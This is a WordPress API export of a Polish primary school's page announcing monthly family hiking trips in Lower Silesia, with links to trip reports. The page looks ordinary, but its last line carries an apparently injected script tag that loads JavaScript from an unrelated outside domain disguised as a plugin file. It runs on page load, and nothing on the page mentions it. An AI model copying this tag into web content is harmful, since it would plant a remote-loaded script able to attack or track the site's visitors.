{"id":12892,"date":"2019-10-11T21:13:46","date_gmt":"2019-10-11T19:13:46","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=12892"},"modified":"2020-04-23T09:19:49","modified_gmt":"2020-04-23T07:19:49","slug":"mrowiny-z-plecakiem","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/mrowiny-z-plecakiem\/","title":{"rendered":"Mrowiny z plecakiem"},"content":{"rendered":"<p style=\"text-align: center;\"><strong>Mrowiny z plecakiem<\/strong><\/p>\n<p>Szko\u0142a Podstawowa im. Anny Jenke w Mrowinach od pa\u017adziernika startuje z now\u0105 inicjatyw\u0105 pod tytu\u0142em \u201eSzko\u0142a z plecakiem\u201d<\/p>\n<p><u>Co oferujemy:<\/u><\/p>\n<p>&#8211; ciekawe wycieczki g\u00f3rskie po najpi\u0119kniejszych zak\u0105tkach Dolnego \u015al\u0105ska,<\/p>\n<p>&#8211; mi\u0142o sp\u0119dzony czas podczas integracji dzieci, rodzic\u00f3w oraz nauczycieli,<\/p>\n<p>&#8211; mo\u017cliwo\u015b\u0107 zdobycia odznak turystycznych<\/p>\n<p><u>Kiedy:<\/u> w ka\u017cd\u0105 trzeci\u0105 sobot\u0119 miesi\u0105ca (ewentualne zmiany terminu b\u0119d\u0105 uzale\u017cnione od warunk\u00f3w pogodowych)<\/p>\n<p><u>Jakie zasady obowi\u0105zuj\u0105:<\/u><\/p>\n<p>&#8211; rodzic lub opiekun dociera na miejsce zbi\u00f3rki razem ze swoim dzieckiem i jest za nie odpowiedzialny<\/p>\n<p>Serdecznie zapraszamy wszystkie dzieci wraz z rodzicami bez wzgl\u0119du na wiek i kondycj\u0119!<\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/10\/plan-wycieczek.doc\">plan wycieczek<\/a><\/p>\n<p>Relacje z naszych wypraw:<\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/mrowiny-z-plecakiem-wyruszyly-na-szlak\/\" target=\"_blank\" rel=\"noopener\">Pierwsza wyprawa<\/a><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/zdobywaja-szczyty-gor-sowich\/\" target=\"_blank\" rel=\"noopener\">Zdobyli\u015bmy szczyty G\u00f3r Sowich &#8211; wyprawa nr 2<\/a><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/ponownie-na-szlaku\/\">Wzg\u00f3rza W\u0142odzickie<\/a><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/zima-odnaleziona\/\" target=\"_blank\" rel=\"noopener\">Zima odnaleziona<\/a><\/p>\n<p>Do zobaczenia na szlaku!<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mrowiny z plecakiem Szko\u0142a Podstawowa im. Anny Jenke w Mrowinach od pa\u017adziernika startuje z now\u0105 inicjatyw\u0105 pod tytu\u0142em \u201eSzko\u0142a z plecakiem\u201d Co oferujemy: &#8211; ciekawe wycieczki g\u00f3rskie po najpi\u0119kniejszych zak\u0105tkach Dolnego \u015al\u0105ska, &#8211; mi\u0142o sp\u0119dzony czas podczas integracji dzieci, rodzic\u00f3w oraz nauczycieli, &#8211; mo\u017cliwo\u015b\u0107 zdobycia odznak turystycznych Kiedy: w ka\u017cd\u0105 trzeci\u0105 sobot\u0119 miesi\u0105ca (ewentualne zmiany [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12892"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=12892"}],"version-history":[{"count":10,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12892\/revisions"}],"predecessor-version":[{"id":14988,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12892\/revisions\/14988"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=12892"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}